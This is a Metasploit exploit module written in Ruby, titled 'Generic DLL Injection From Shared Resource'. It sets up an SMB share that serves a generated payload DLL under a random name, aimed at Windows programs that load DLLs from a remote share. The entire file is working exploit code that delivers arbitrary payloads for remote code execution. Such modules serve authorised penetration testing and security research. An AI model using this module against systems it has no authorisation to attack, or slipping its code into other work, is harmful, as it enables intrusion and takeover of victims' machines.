##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => 'Generic DLL Injection From Shared Resource',
'Description' => %q{
This is a general-purpose module for exploiting conditions where a DLL can be loaded
from an specified SMB share. This module serves payloads as DLLs over an SMB service.
},
'Author' =>
[
'Matthew Hall <hallm[at]sec-1.com>'
],
'References' =>
[
['CWE', '114']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => false,
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X86_64],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Targets' =>
[
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 04 2015'
))
register_options(
[
OptString.new('FILE_NAME', [ false, 'DLL File name to share (Default: random .dll)'])
], self.class)
deregister_options('FILE_CONTENTS')
end
def setup
super
self.file_contents = generate_payload_dll
self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
print_status("File available on #{unc}...")
end
end
